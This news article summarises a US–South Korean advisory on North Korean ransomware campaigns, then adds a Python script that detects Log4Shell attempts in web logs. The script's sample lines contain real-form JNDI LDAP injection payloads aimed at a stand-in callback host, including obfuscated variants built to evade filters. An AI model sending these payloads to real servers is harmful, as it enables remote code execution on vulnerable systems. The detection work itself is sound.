Hacker groups working on behalf of the North Korean government target organizations in the healthcare sector and critical infrastructure entities with ransomware attacks to generate revenue to support the Kim regime, a joint advisory from the US and South Korean cybersecurity authorities warns.
According to the agencies, the North Korean state-backed hackers have deployed not only their own ransomware strains, Maui and H0lyGh0st, but also ransomware developed by other cybercriminal gangs, including BitLocker (not a malware family but Windows' built-in volume encryption, turned against the victim to lock them out of their own data), Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom. In some cases the North Korean threat actors posed as other ransomware groups, such as REvil.
To gain initial access and escalate privileges on target networks, the threat actors exploit publicly known vulnerabilities in widely used software, including Apache Log4j (CVE-2021-44228, "Log4Shell"), SonicWall appliances (CVE-2021-20038), and TerraMaster TOS (CVE-2022-24990); vendor patches for all three were available well before the advisory was published, so unpatched exposed instances are the first thing to check. The advisory also says the actors likely spread malicious code through trojanized files for "X-Popup," an open-source messenger commonly used by employees of small and medium hospitals in South Korea.
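Of the three vulnerabilities above, Log4Shell is the one that leaves the clearest trace in ordinary web logs, because the attacker has to deliver a `${jndi:...}` lookup string in some logged field (User-Agent, Referer, query string). The following is an added example, not code from the advisory or from any of the agencies, showing detection logic that first strips the URL-encoding and nested-lookup obfuscation (`${lower:j}`, `${::-j}`, `${env:X:-j}`) attackers use to slip past naive `jndi` string matches, then reports the scheme and callback target. The access-log lines are constructed for the example and use documentation IP ranges; the `${jndi:...}` payload shapes are the real CVE-2021-44228 trigger form.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server access-log lines; they are not taken from the
# advisory. The first three carry Log4Shell (CVE-2021-44228) probes in the
# User-Agent, the query string and the Referer respectively; the last two are
# benign, and the final one contains the bare word "jndi" as a false-positive check.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [09/Feb/2023:10:01:22 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.77:1389/a}"',
    '203.0.113.5 - - [09/Feb/2023:10:01:23 +0000] "GET /api?x=%24%7B%24%7Blower%3Aj%7D'
    'ndi%3Aldap%3A%2F%2F203.0.113.77%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.81.0"',
    '203.0.113.5 - - [09/Feb/2023:10:01:24 +0000] "GET / HTTP/1.1" 200 1024 '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://203.0.113.77:1389/c}" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Feb/2023:10:02:00 +0000] "GET /static/app.js HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [09/Feb/2023:10:02:01 +0000] "POST /search HTTP/1.1" 200 300 "-" "Mozilla/5.0 (jndi-enthusiast)"',
]

# Log4j lookup forms attackers use to hide the literal "jndi" token. Each regex
# matches only a lookup with no nested braces inside it, so repeated substitution
# unwinds nesting from the inside out.
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")            # ${::-j}, ${env:NOPE:-j}
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)  # ${lower:J}, ${upper:n}

# The lookup that actually triggers the vulnerable JNDI fetch once de-obfuscated.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:(?P<target>[^}]*)\}", re.I)


def normalize(text, max_rounds=10):
    """URL-decode and collapse Log4j lookup obfuscation until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(text)                                   # %24%7B -> ${
        decoded = _DEFAULT_VALUE.sub(r"\1", decoded)              # ${::-j} -> j
        decoded = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), decoded)  # ${lower:J} -> j
        if decoded == text:
            break
        text = decoded
    return text


def find_log4shell_attempts(lines):
    """Return one finding per log line that contains a (de-obfuscated) JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            findings.append({
                "line": number,
                "source_ip": line.split(" ", 1)[0],               # first token of a combined-format line
                "scheme": match.group("scheme").lower(),          # ldap, rmi, dns, ...
                "target": match.group("target").strip(),          # attacker callback host:port/path
            })
    return findings


if __name__ == "__main__":
    for finding in find_log4shell_attempts(SAMPLE_LOG_LINES):
        print(finding)
```

Matching on the raw string `${jndi:` alone misses the second and third lines; the normalization step is what makes the rule hold up. A hit here is an exploitation attempt, not proof of compromise: the callback `target` is what to pivot on, both to block it and to check for outbound LDAP/RMI connections from the logging host around the same timestamp.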
“DPRK actors generate domains, personas, and accounts; and identify cryptocurrency services to conduct their ransomware operations. Actors procure infrastructure, IP addresses, and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft,” the advisory said.
North Korean hackers were also observed using virtual private networks (VPNs), virtual private servers (VPSs), or third-country IP addresses to obscure their true location.
“DPRK cyber actors have been observed setting ransoms in bitcoin. Actors are known to communicate with victims via Proton Mail email accounts,” the advisory said. “For private companies in the healthcare sector, actors may threaten to expose a company’s proprietary data to competitors if ransoms are not paid.”
To prevent such attacks, the cybersecurity authorities recommend that organizations implement the principle of least privilege, disable unnecessary network device management interfaces, enforce multi-layer network segmentation, require phishing-resistant authentication controls, and maintain periodic data backups.
UN experts said that hackers tied to North Korea stole a record amount of virtual assets in 2022, estimated at between $630 million and more than $1 billion.